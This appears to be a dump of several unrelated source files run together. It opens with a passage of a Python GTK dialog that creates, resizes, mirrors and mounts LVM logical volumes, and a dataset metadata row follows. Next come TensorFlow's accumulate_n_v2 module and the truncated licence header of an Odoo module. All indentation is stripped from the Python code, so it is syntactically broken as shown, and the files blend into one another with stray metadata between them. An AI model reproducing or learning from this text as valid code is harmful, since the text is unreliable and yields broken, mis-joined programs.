self.size_units_combo.connect('changed', self.on_units_change)
self.size_scale.connect('adjust-bounds', self.on_size_change_scale)
self.size_entry.connect('focus-out-event', self.on_size_change_entry)
self.glade_xml.get_widget('linear').connect('clicked', self.on_linear_changed)
self.glade_xml.get_widget('enable_mirroring').connect('clicked', self.on_enable_mirroring)
self.glade_xml.get_widget('striped').connect('clicked', self.on_striped_changed)
self.glade_xml.get_widget('mount').connect('clicked', self.on_mount_changed)
self.glade_xml.get_widget('mount_at_reboot').connect('clicked', self.on_mount_changed)
self.glade_xml.get_widget('use_remaining_button').connect('clicked', self.on_use_remaining)
def on_linear_changed(self, obj):
if self.glade_xml.get_widget('linear').get_active() == False:
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.glade_xml.get_widget('enable_mirroring').set_sensitive(False)
return
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(False)
self.glade_xml.get_widget('enable_mirroring').set_sensitive(True)
def on_striped_changed(self, obj):
if self.glade_xml.get_widget('striped').get_active() == False:
return
pv_list = self.vg.get_pvs()
if len(pv_list) < 2: #striping is not an option
self.errorMessage(CANT_STRIPE_MESSAGE)
self.glade_xml.get_widget('linear').set_active(True)
return
else:
self.glade_xml.get_widget('stripes_container').set_sensitive(True)
def on_enable_mirroring(self, obj):
if self.glade_xml.get_widget('enable_mirroring').get_active() == False:
self.update_size_limits()
return
# is mirroring supported by lvm version in use?
if self.model_factory.is_mirroring_supported() == False:
self.errorMessage(_("Underlying Logical Volume Management does not support mirroring"))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# check if lv is striped - no mirroring
if not self.new:
if self.lv.is_striped():
self.errorMessage(_("Striped Logical Volumes cannot be mirrored."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# check if lv is origin - no mirroring
if not self.new:
if self.lv.has_snapshots() and not self.lv.is_mirrored():
self.errorMessage(_("Logical Volumes with associated snapshots cannot be mirrored yet."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
# mirror images placement: diff HDs or anywhere
if self.mirror_to_diff_hds == None: # prompt
rc = self.questionMessage(_("The primary purpose of mirroring is to protect data in the case of hard drive failure. Do you want to place mirror images onto different hard drives?"))
if rc == gtk.RESPONSE_YES:
self.mirror_to_diff_hds = True
else:
self.mirror_to_diff_hds = False
max_mirror_size = self.__get_max_mirror_data(self.vg)[0]
if max_mirror_size == 0:
if self.mirror_to_diff_hds:
self.errorMessage(_("Less than 3 hard drives are available with free space. Disabling mirroring."))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
else:
self.errorMessage(_("There must be free space on at least three Physical Volumes to enable mirroring"))
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.update_size_limits()
return
if self.size_new > max_mirror_size:
if self.new:
self.update_size_limits(max_mirror_size)
self.infoMessage(_("The size of the Logical Volume has been adjusted to the maximum available size for mirrors."))
self.size_entry.select_region(0, (-1))
self.size_entry.grab_focus()
else:
if self.lv.is_mirrored() == False:
message = _("There is not enough free space to add mirroring. Reduce size of Logical Volume to at most %s, or add Physical Volumes.")
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
reduce_to_string = str(self.__get_num(max_mirror_size)) + ' ' + units
self.errorMessage(message % reduce_to_string)
self.glade_xml.get_widget('enable_mirroring').set_active(False)
self.size_entry.select_region(0, (-1))
self.size_entry.grab_focus()
else:
self.update_size_limits()
else:
self.update_size_limits(max_mirror_size)
def __get_max_mirror_data(self, vg):
# copy pvs into list
free_list = []
for pv in vg.get_pvs().values():
free_extents = pv.get_extent_total_used_free()[2]
# add extents of current LV
if not self.new:
if self.lv.is_mirrored():
lvs_to_match = self.lv.get_segments()[0].get_images()
else:
lvs_to_match = [self.lv]
for ext in pv.get_extent_blocks():
if ext.get_lv() in lvs_to_match:
free_extents = free_extents + ext.get_start_size()[1]
if free_extents != 0:
free_list.append((free_extents, pv))
if self.mirror_to_diff_hds:
## place mirror onto different hds ##
# group pvs into hd groups
devices = {}
for t in free_list:
pv = t[1]
pv_free = t[0]
device_name_in_list = None
for devname in pv.getDevnames():
if devname in devices.keys():
device_name_in_list = devname
if device_name_in_list == None:
if len(pv.getDevnames()) == 0:
# no known devnmaes
devices[pv.get_path()] = [pv_free, [[pv_free, pv]]]
else:
# not in the list
devices[pv.getDevnames()[0]] = [pv_free, [[pv_free, pv]]]
else:
devices[device_name_in_list][0] = devices[device_name_in_list][0] + pv_free
devices[device_name_in_list][1].append([pv_free, pv])
free_list = devices.values()
if len(devices.keys()) < 3:
return 0, [], [], []
# sort free_list
for i in range(len(free_list) - 1, 0, -1):
for j in range(0, i):
if free_list[j][0] < free_list[j + 1][0]:
tmp = free_list[j + 1]
free_list[j + 1] = free_list[j]
free_list[j] = tmp
# sort within free_list
for t in free_list:
sort_me = t[1]
for i in range(len(sort_me) - 1, 0, -1):
for j in range(0, i):
if sort_me[j][0] < sort_me[j + 1][0]:
tmp = sort_me[j + 1]
sort_me[j + 1] = sort_me[j]
sort_me[j] = tmp
# create list of largest partitions
largest_list = []
for t in free_list:
t_largest_size = t[1][0][0]
t_largest_pv = t[1][0][1]
largest_list.append([t_largest_size, t_largest_pv])
# sort largest list
for i in range(len(largest_list) - 1, 0, -1):
for j in range(0, i):
if largest_list[j][0] < largest_list[j + 1][0]:
tmp = largest_list[j + 1]
largest_list[j + 1] = largest_list[j]
largest_list[j] = tmp
return largest_list[1][0], [largest_list[0][1]], [largest_list[1][1]], [largest_list.pop()[1]]
else:
## place mirror anywhere, even on the same hd :( ##
if len(free_list) < 3:
return 0, [], [], []
# sort
for i in range(len(free_list) - 1, 0, -1):
for j in range(0, i):
if free_list[j][0] < free_list[j + 1][0]:
tmp = free_list[j + 1]
free_list[j + 1] = free_list[j]
free_list[j] = tmp
# remove smallest one for log
log = free_list.pop()[1]
# place pvs into buckets of similar size
buck1, s1 = [free_list[0][1]], free_list[0][0]
buck2, s2 = [free_list[1][1]], free_list[1][0]
for t in free_list[2:]:
if s1 < s2:
s1 = s1 + t[0]
buck1.append(t[1])
else:
s2 = s2 + t[0]
buck2.append(t[1])
max_m_size = 0
if s1 < s2:
max_m_size = s1
else:
max_m_size = s2
return max_m_size, buck1, buck2, [log]
def on_mount_changed(self, obj):
m1 = self.glade_xml.get_widget('mount').get_active()
m2 = self.glade_xml.get_widget('mount_at_reboot').get_active()
if m1 or m2:
self.mountpoint_entry.set_sensitive(True)
else:
self.mountpoint_entry.set_sensitive(False)
def on_fs_config(self, button):
pass
def on_fs_change(self, obj):
self.filesys_show_hide()
# go thru on_enable_mirroring() to get to update_size_limits,
# that in turn disables resizing if fs doesn't support that
self.on_enable_mirroring(None)
def filesys_show_hide(self):
iter = self.filesys_combo.get_active_iter()
filesys = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
if filesys.editable:
self.fs_config_button.set_sensitive(True)
else:
self.fs_config_button.set_sensitive(False)
if filesys.mountable:
self.glade_xml.get_widget('mountpoint_container').set_sensitive(True)
self.glade_xml.get_widget('mount_container').set_sensitive(True)
else:
self.glade_xml.get_widget('mount').set_active(False)
self.glade_xml.get_widget('mount_at_reboot').set_active(False)
self.glade_xml.get_widget('mountpoint_container').set_sensitive(False)
self.glade_xml.get_widget('mount_container').set_sensitive(False)
def update_size_limits(self, upper=None):
iter = self.filesys_combo.get_active_iter()
filesys = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
fs_resizable = (filesys.extendable_online or filesys.extendable_offline or filesys.reducible_online or filesys.reducible_offline)
if not self.new:
if fs_resizable:
self.glade_xml.get_widget('fs_not_resizable').hide()
else:
self.glade_xml.get_widget('fs_not_resizable').show()
if self.lv.has_snapshots():
self.glade_xml.get_widget('origin_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
return
elif self.lv.is_mirrored():
if self.glade_xml.get_widget('enable_mirroring').get_active():
self.glade_xml.get_widget('mirror_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
self.set_size_new(self.size)
return
else:
self.glade_xml.get_widget('mirror_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
self.size_lower = 1
if upper == None:
self.size_upper = self.vg.get_extent_total_used_free()[2] + self.size
else:
self.size_upper = upper
as_new = self.new
fs_change = not (filesys == self.fs)
if fs_change:
as_new = True
if as_new:
self.glade_xml.get_widget('fs_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
else:
if not (filesys.extendable_online or filesys.extendable_offline):
self.size_upper = self.size
if not (filesys.reducible_online or filesys.reducible_offline):
self.size_lower = self.size
if fs_resizable:
self.glade_xml.get_widget('fs_not_resizable').hide()
self.glade_xml.get_widget('free_space_label').show()
self.size_scale.set_sensitive(True)
self.size_entry.set_sensitive(True)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(True)
self.glade_xml.get_widget('remaining_space_label').show()
else:
self.glade_xml.get_widget('fs_not_resizable').show()
self.glade_xml.get_widget('free_space_label').hide()
self.size_scale.set_sensitive(False)
self.size_entry.set_sensitive(False)
self.glade_xml.get_widget('use_remaining_button').set_sensitive(False)
self.glade_xml.get_widget('remaining_space_label').hide()
# set old size value
self.set_size_new(self.size)
if self.size_lower < self.size_upper:
self.glade_xml.get_widget('size_scale_container').set_sensitive(True)
else:
self.glade_xml.get_widget('size_scale_container').set_sensitive(False)
# update values to be within limits
self.change_size_units()
self.set_size_new(self.size_new)
def on_units_change(self, obj):
self.change_size_units()
def change_size_units(self):
lower = self.__get_num(self.size_lower)
upper = self.__get_num(self.size_upper)
size_beg_label = self.glade_xml.get_widget('size_beg')
size_beg_label.set_text(str(lower))
size_end_label = self.glade_xml.get_widget('size_end')
size_end_label.set_text(str(upper))
if self.size_lower < self.size_upper:
self.size_scale.set_range(lower, upper)
self.set_size_new(self.size_new)
def update_remaining_space_label(self):
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
rem = self.size_upper - self.size_new
rem_vg = self.vg.get_extent_total_used_free()[2]
if self.glade_xml.get_widget('enable_mirroring').get_active():
mirror_log_size = 1
rem_vg = rem_vg + (self.size - self.size_new) * 2 - mirror_log_size
else:
rem_vg = rem_vg - self.size_new + self.size
string_vg = REMAINING_SPACE_VG + str(self.__get_num(rem_vg)) + ' ' + units
self.glade_xml.get_widget('free_space_label').set_text(string_vg)
string = REMAINING_SPACE_AFTER + str(self.__get_num(rem)) + ' ' + units
self.glade_xml.get_widget('remaining_space_label').set_text(string)
def on_use_remaining(self, obj):
self.set_size_new(self.size_upper)
def on_size_change_scale(self, obj1, obj2):
size = self.size_scale.get_value()
self.set_size_new(self.__get_extents(size))
def on_size_change_entry(self, obj1, obj2):
size_text = self.size_entry.get_text()
size_float = 0.0
try: ##In case gibberish is entered into the size field...
size_float = float(size_text)
except ValueError, e:
self.size_entry.set_text(str(self.__get_num(self.size_new)))
return False
self.set_size_new(self.__get_extents(size_float))
return False
def set_size_new(self, exts):
size = exts
if size > self.size_upper:
size = self.size_upper
elif size < self.size_lower:
size = self.size_lower
self.size_new = size
size_units = self.__get_num(size)
self.size_entry.set_text(str(size_units))
self.size_scale.set_value(size_units)
self.update_remaining_space_label()
def __get_extents(self, num):
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
if units == EXTENTS:
return int(num)
elif units == GIGABYTES:
num = int(num * 1024 * 1024 * 1024 / self.extent_size)
elif units == MEGABYTES:
num = int(num * 1024 * 1024 / self.extent_size)
elif units == KILOBYTES:
num = int(num * 1024 / self.extent_size)
if num < 1:
num = 1
return num
def __get_num(self, extents):
iter = self.size_units_combo.get_active_iter()
units = self.size_units_combo.get_model().get_value(iter, 0)
if units == EXTENTS:
return int(extents)
elif units == GIGABYTES:
val = extents * self.extent_size / 1024.0 / 1024.0 / 1024.0
elif units == MEGABYTES:
val = extents * self.extent_size / 1024.0 / 1024.0
elif units == KILOBYTES:
val = extents * self.extent_size / 1024.0
string = '%.2f' % float(val)
return float(string)
def apply(self):
name_new = self.name_entry.get_text().strip()
size_new = int(self.size_new) # in extents
iter = self.filesys_combo.get_active_iter()
filesys_new = self.filesystems[self.filesys_combo.get_model().get_value(iter, 0)]
if filesys_new.mountable:
mount_new = self.glade_xml.get_widget('mount').get_active()
mount_at_reboot_new = self.glade_xml.get_widget('mount_at_reboot').get_active()
mountpoint_new = self.mountpoint_entry.get_text().strip()
else:
mount_new = False
mount_at_reboot_new = False
mountpoint_new = ''
mirrored_new = self.glade_xml.get_widget('enable_mirroring').get_active()
striped = self.glade_xml.get_widget('striped').get_active()
stripe_size_combo = self.glade_xml.get_widget('stripe_size')
iter = stripe_size_combo.get_active_iter()
stripe_size = int(stripe_size_combo.get_model().get_value(iter, 0))
stripes_num = int(self.glade_xml.get_widget('stripes_num').get_value_as_int())
# TODO
fs_options_changed = False
# validation Ladder
# name
if name_new == '':
self.errorMessage(MUST_PROVIDE_NAME)
return False
# illegal characters
invalid_lvname_message = ''
if re.match('snapshot', name_new) or re.match('pvmove', name_new):
invalid_lvname_message = _("Names beginning with \"snapshot\" or \"pvmove\" are reserved keywords.")
elif re.search('_mlog', name_new) or re.search('_mimage', name_new):
invalid_lvname_message = _("Names containing \"_mlog\" or \"_mimage\" are reserved keywords.")
elif name_new[0] == '-':
invalid_lvname_message = _("Names beginning with a \"-\" are invalid")
elif name_new == '.' or name_new == '..':
invalid_lvname_message = _("Name can be neither \".\" nor \"..\"")
else:
for t in name_new:
if t in string.ascii_letters + string.digits + '._-+':
continue
elif t in string.whitespace:
invalid_lvname_message = _("Whitespaces are not allowed in Logical Volume names")
break
else:
invalid_lvname_message = _("Invalid character \"%s\" in Logical Volume name") % t
break
if invalid_lvname_message != '':
self.errorMessage(invalid_lvname_message)
self.name_entry.select_region(0, (-1))
self.name_entry.grab_focus()
return False
# Name must be unique for this VG
for lv in self.vg.get_lvs().values():
if lv.get_name() == name_new:
if not self.new:
if self.lv.get_name() == name_new:
continue
self.name_entry.select_region(0, (-1))
self.name_entry.grab_focus()
self.errorMessage(NON_UNIQUE_NAME % name_new)
return False
# check mountpoint
if mount_new or mount_at_reboot_new:
if mountpoint_new == '':
self.errorMessage(_("Please specify mount point"))
return False
# create folder if it doesn't exist
if os.path.exists(mountpoint_new) == False: ###stat mnt point
rc = self.questionMessage(BAD_MNT_POINT % mountpoint_new)
if (rc == gtk.RESPONSE_YES): #create mount point
try:
os.mkdir(mountpoint_new)
except OSError, e:
self.errorMessage(BAD_MNT_CREATION % mountpoint_new)
self.mountpoint_entry.set_text('')
return False
else:
self.mountpoint_entry.select_region(0, (-1))
return False
# action
if self.new:
### new LV ###
# create LV
new_lv_command_set = {}
new_lv_command_set[NEW_LV_NAME_ARG] = name_new
new_lv_command_set[NEW_LV_VGNAME_ARG] = self.vg.get_name()
new_lv_command_set[NEW_LV_UNIT_ARG] = EXTENT_IDX
new_lv_command_set[NEW_LV_SIZE_ARG] = size_new
new_lv_command_set[NEW_LV_IS_STRIPED_ARG] = striped
new_lv_command_set[NEW_LV_MIRRORING] = mirrored_new
if striped == True:
new_lv_command_set[NEW_LV_STRIPE_SIZE_ARG] = stripe_size
new_lv_command_set[NEW_LV_NUM_STRIPES_ARG] = stripes_num
new_lv_command_set[NEW_LV_SNAPSHOT] = self.snapshot
if self.snapshot:
new_lv_command_set[NEW_LV_SNAPSHOT_ORIGIN] = self.lv.get_path()
pvs_to_create_at = []
if mirrored_new:
size, b1, b2, l1 = self.__get_max_mirror_data(self.vg)
pvs_to_create_at = b1[:]
for pv in b2:
pvs_to_create_at.append(pv)
for pv in l1:
pvs_to_create_at.append(pv)
self.command_handler.new_lv(new_lv_command_set, pvs_to_create_at)
lv_path = self.model_factory.get_logical_volume_path(name_new, self.vg.get_name())
# make filesystem
if not self.snapshot:
try:
filesys_new.create(lv_path)
except CommandError, e:
self.command_handler.remove_lv(lv_path)
raise e
# mount
if mount_new:
self.command_handler.mount(lv_path, mountpoint_new, filesys_new.fsname)
if mount_at_reboot_new:
Fstab.add(lv_path, mountpoint_new, filesys_new.fsname)
else:
### edit LV ###
rename = name_new != self.lv.get_name()
filesys_change = (filesys_new != self.fs)
ext2_to_ext3 = (filesys_new.name == Filesystem.ext3().name) and (self.fs.name == Filesystem.ext2().name)
if ext2_to_ext3:
retval = self.questionMessage(_("Do you want to upgrade ext2 to ext3 preserving data on Logical Volume?"))
if (retval == gtk.RESPONSE_NO):
ext2_to_ext3 = False
snapshot = None
if self.lv.is_snapshot():
snapshot = self.lv.get_snapshot_info()[0]
resize = (size_new != self.size)
extend = (size_new > self.size)
reduce = (size_new < self.size)
# remove mirror if not needed anymore
if self.lv.is_mirrored() and not mirrored_new:
self.command_handler.remove_mirroring(self.lv.get_path())
# DEBUGING: check if resizing is posible
#if extend:
# if self.command_handler.extend_lv(self.lv.get_path(), size_new, True) == False:
# retval = self.infoMessage(_("fixme: resizing not possible"))
# return False
#elif reduce:
# if self.command_handler.reduce_lv(self.lv.get_path(), size_new, True) == False:
# retval = self.infoMessage(_("fixme: resizing not possible"))
# return False
mounted = self.mount
unmount = False
unmount_prompt = True
if rename or filesys_change or mount_new == False:
unmount = True
if resize and self.lv.is_mirrored():
unmount = True
if filesys_change and self.fs.name!=self.fs_none.name and not ext2_to_ext3:
retval = self.warningMessage(_("Changing the filesystem will destroy all data on the Logical Volume! Are you sure you want to proceed?"))
if (retval == gtk.RESPONSE_NO):
return False
unmount_prompt = False
else:
if not snapshot:
if extend and mounted and (not self.fs.extendable_online):
unmount = True
if reduce and mounted and (not self.fs.reducible_online):
unmount = True
# unmount if needed
if unmount and mounted:
if unmount_prompt:
retval = self.warningMessage(UNMOUNT_PROMPT % (self.lv.get_path(), self.mount_point))
if (retval == gtk.RESPONSE_NO):
return False
self.command_handler.unmount(self.mount_point)
mounted = False
# rename
if rename:
self.command_handler.rename_lv(self.vg.get_name(), self.lv.get_name(), name_new)
lv_path = self.model_factory.get_logical_volume_path(name_new, self.vg.get_name())
lv_path_old = self.lv.get_path()
# resize lv
if resize:
if (filesys_change and not ext2_to_ext3) or snapshot:
# resize LV only
if size_new > self.size:
self.command_handler.extend_lv(lv_path, size_new)
else:
self.command_handler.reduce_lv(lv_path, size_new)
else:
# resize lv and filesystem
if size_new > self.size:
# resize LV first
self.command_handler.extend_lv(lv_path, size_new)
# resize FS
try:
if mounted:
if self.fs.extendable_online:
self.fs.extend_online(lv_path)
else:
self.command_handler.unmount(self.mount_point)
mounted = False
self.fs.extend_offline(lv_path)
else:
if self.fs.extendable_offline:
self.fs.extend_offline(lv_path)
else:
# mount temporarily
tmp_mountpoint = '/tmp/tmp_mountpoint'
while os.access(tmp_mountpoint, os.F_OK):
tmp_mountpoint = tmp_mountpoint + '1'
os.mkdir(tmp_mountpoint)
self.command_handler.mount(lv_path, tmp_mountpoint)
self.fs.extend_online(lv_path)
self.command_handler.unmount(tmp_mountpoint)
os.rmdir(tmp_mountpoint)
except:
# revert LV size
self.command_handler.reduce_lv(lv_path, self.size)
raise
else:
# resize FS first
new_size_bytes = size_new * self.extent_size
if mounted:
if self.fs.reducible_online:
self.fs.reduce_online(lv_path, new_size_bytes)
else:
self.command_handler.unmount(self.mount_point)
mounted = False
self.fs.reduce_offline(lv_path, new_size_bytes)
else:
if self.fs.reducible_offline:
self.fs.reduce_offline(lv_path, new_size_bytes)
else:
# mount temporarily
tmp_mountpoint = '/tmp/tmp_mountpoint'
while os.access(tmp_mountpoint, os.F_OK):
tmp_mountpoint = tmp_mountpoint + '1'
os.mkdir(tmp_mountpoint)
self.command_handler.mount(lv_path, tmp_mountpoint)
self.fs.reduce_online(lv_path, new_size_bytes)
self.command_handler.unmount(tmp_mountpoint)
os.rmdir(tmp_mountpoint)
# resize LV
self.command_handler.reduce_lv(lv_path, size_new)
# add mirror if needed
if not self.lv.is_mirrored() and mirrored_new:
# first reload lvm_data so that resizing info is known
self.model_factory.reload()
self.lv = self.model_factory.get_VG(self.lv.get_vg().get_name()).get_lvs()[name_new]
# make room for mirror (free some pvs of main image's extents)
pvlist_from_make_room = self.__make_room_for_mirror(self.lv)
if pvlist_from_make_room == None:
# migration not performed, continue process with no mirroring
self.infoMessage(_("Mirror not created. Completing remaining tasks."))
else:
# create mirror
self.infoMessage(_('Underlaying LVM doesn\'t support addition of mirrors to existing Logical Volumes. Completing remaining tasks.'))
#self.command_handler.add_mirroring(self.lv.get_path(), pvlist_from_make_room)
pass
# fs options
if fs_options_changed and not filesys_change:
self.fs.change_options(lv_path)
# change FS
if filesys_change:
if ext2_to_ext3:
self.fs.upgrade(lv_path)
else:
filesys_new.create(lv_path)
# mount
fsname = self.fs.fsname
if filesys_change:
fsname = filesys_new.fsname
if mount_new and not mounted:
self.command_handler.mount(lv_path, mountpoint_new, fsname)
# remove old fstab entry
Fstab.remove(self.mount_point)
if mount_at_reboot_new:
# add new entry
Fstab.add(lv_path, mountpoint_new, fsname)
return True
# return list of pvs to use for mirror, or None on failure
def __make_room_for_mirror(self, lv):
t, bucket1, bucket2, logs = self.__get_max_mirror_data(lv.get_vg())
return_pvlist = bucket1[:]
for pv in bucket2:
return_pvlist.append(pv)
for pv in logs:
return_pvlist.append(pv)
structs = self.__get_structs_for_ext_migration(lv)
if len(structs) == 0:
# nothing to be migrated
return return_pvlist
# extents need moving :(
string = ''
for struct in structs:
string = string + '\n' + struct[0].get_path()
string = string + ':' + str(struct[1]) + '-' + str(struct[1] + struct[2] - 1)
string = string + ' -> ' + struct[3].get_path()
rc = self.questionMessage(_("In order to add mirroring, some extents need to be migrated.") + '\n' + string + '\n' + _("Do you want to migrate specified extents?"))
if rc == gtk.RESPONSE_YES:
for struct in structs:
pv_from = struct[0]
ext_start = struct[1]
size = struct[2]
pv_to = struct[3]
self.command_handler.move_pv(pv_from.get_path(),
[(ext_start, size)],
[pv_to.get_path(), None, lv.get_path()])
return return_pvlist
else:
return None
# return [[pv_from, ext_start, size, pv_to], ...]
def __get_structs_for_ext_migration(self, lv):
t, bucket1, bucket2, logs = self.__get_max_mirror_data(lv.get_vg())
# pick bucket to move lv to
if self.__get_extent_count_in_bucket(lv, bucket1) < self.__get_extent_count_in_bucket(lv, bucket2):
bucket_to = bucket2
else:
bucket_to = bucket1
bucket_from = []
for pv in lv.get_vg().get_pvs().values():
if pv not in bucket_to:
bucket_from.append(pv)
structs = []
bucket_to_i = 0
pv_to = bucket_to[bucket_to_i]
free_exts = pv_to.get_extent_total_used_free()[2]
for pv_from in bucket_from:
for ext_block in pv_from.get_extent_blocks():
if ext_block.get_lv() != lv:
continue
block_start, block_size = ext_block.get_start_size()
while block_size != 0:
if block_size >= free_exts:
structs.append([pv_from, block_start, free_exts, pv_to])
block_start = block_start + free_exts
block_size = block_size - free_exts
# get next pv_to from bucket_to
bucket_to_i = bucket_to_i + 1
if bucket_to_i == len(bucket_to):
# should be done
return structs
pv_to = bucket_to[bucket_to_i]
free_exts = pv_to.get_extent_total_used_free()[2]
else:
structs.append([pv_from, block_start, block_size, pv_to])
block_start = block_start + block_size
block_size = block_size - block_size
free_exts = free_exts - block_size
return structs
def __get_extent_count_in_bucket(self, lv, bucket_pvs):
ext_count = 0
for pv in bucket_pvs:
for ext_block in pv.get_extent_blocks():
if ext_block.get_lv() == lv:
ext_count = ext_count + ext_block.get_start_size()[1]
return ext_count
def errorMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_ERROR, gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def infoMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO, gtk.BUTTONS_OK,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
return rc
def questionMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_INFO, gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
if (rc == gtk.RESPONSE_NO):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_DELETE_EVENT):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CLOSE):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CANCEL):
return gtk.RESPONSE_NO
else:
return rc
def warningMessage(self, message):
dlg = gtk.MessageDialog(None, 0,
gtk.MESSAGE_WARNING, gtk.BUTTONS_YES_NO,
message)
dlg.show_all()
rc = dlg.run()
dlg.destroy()
if (rc == gtk.RESPONSE_NO):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_DELETE_EVENT):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CLOSE):
return gtk.RESPONSE_NO
elif (rc == gtk.RESPONSE_CANCEL):
return gtk.RESPONSE_NO
else:
return rc
| gpl-2.0 | -661,362,197,953,986,600 | 42.015431 | 401 | 0.559245 | false |
av8ramit/tensorflow | tensorflow/contrib/framework/python/ops/accumulate_n_v2.py | 3 | 4363 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops that will eventually be folded into tensorflow/python/ops/math_ops.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import math_ops
def accumulate_n_v2(inputs, shape=None, tensor_dtype=None, name=None):
"""Returns the element-wise sum of a list of tensors.
Optionally, pass `shape` and `tensor_dtype` for shape and type checking,
otherwise, these are inferred.
`tf.accumulate_n_v2` performs the same operation as `tf.add_n`, but does not
wait for all of its inputs to be ready before beginning to sum. This can
save memory if inputs are ready at different times, since minimum temporary
storage is proportional to the output size rather than the inputs size.
Unlike the original `accumulate_n`, `accumulate_n_v2` is differentiable.
For example:
```python
a = tf.constant([[1, 2], [3, 4]])
b = tf.constant([[5, 0], [0, 6]])
tf.accumulate_n_v2([a, b, a]) # [[7, 4], [6, 14]]
# Explicitly pass shape and type
tf.accumulate_n_v2([a, b, a], shape=[2, 2], tensor_dtype=tf.int32)
# [[7, 4],
# [6, 14]]
```
Args:
inputs: A list of `Tensor` objects, each with same shape and type.
shape: Shape of elements of `inputs`.
tensor_dtype: The type of `inputs`.
name: A name for the operation (optional).
Returns:
A `Tensor` of same shape and type as the elements of `inputs`.
Raises:
ValueError: If `inputs` don't all have same shape and dtype or the shape
cannot be inferred.
"""
_INPUTS_ERR_MSG = ValueError("inputs must be a list of at least one Tensor"
"with the same dtype and shape")
if not inputs or not isinstance(inputs, (list, tuple)):
raise _INPUTS_ERR_MSG
inputs = ops.convert_n_to_tensor_or_indexed_slices(inputs)
if not all(isinstance(x, ops.Tensor) for x in inputs):
raise _INPUTS_ERR_MSG
if not all(x.dtype == inputs[0].dtype for x in inputs):
raise _INPUTS_ERR_MSG
if shape is not None:
shape = tensor_shape.as_shape(shape)
else:
shape = tensor_shape.unknown_shape()
for input_tensor in inputs:
if isinstance(input_tensor, ops.Tensor):
shape = shape.merge_with(input_tensor.get_shape())
# tensor_dtype is for safety only; operator's output type computed in C++
if tensor_dtype is not None and tensor_dtype != inputs[0].dtype:
raise TypeError("tensor_dtype is {}, but input is of type {}"
.format(tensor_dtype, inputs[0].dtype))
if len(inputs) == 1 and name is None:
return inputs[0]
elif len(inputs) == 1 and name is not None:
return array_ops.identity(inputs[0], name=name)
elif context.in_eager_mode():
# TemporaryVariable not currently supported in eager mode; fall back
# onto AddN for now.
# TODO(frreiss) remove this once the lifetime of eager variables gets
# addressed
return math_ops.add_n(inputs, name=name)
else:
return gen_math_ops._accumulate_nv2(inputs, name=name, shape=shape)
# The following code should eventually be merged into
# tensorflow/python/ops/math_grad.py
@ops.RegisterGradient("AccumulateNV2")
def _AddNGrad(op, grad):
"""Same as gradient for AddN. Copies the gradient to all inputs."""
# Not broadcasting.
return [grad] * len(op.inputs)
| apache-2.0 | 3,329,057,445,318,795,300 | 38.306306 | 80 | 0.67041 | false |
ddico/sale-workflow | sale_properties_dynamic_fields/__init__.py | 15 | 1047 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014-15 Agile Business Group sagl
# (<http://www.agilebg.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
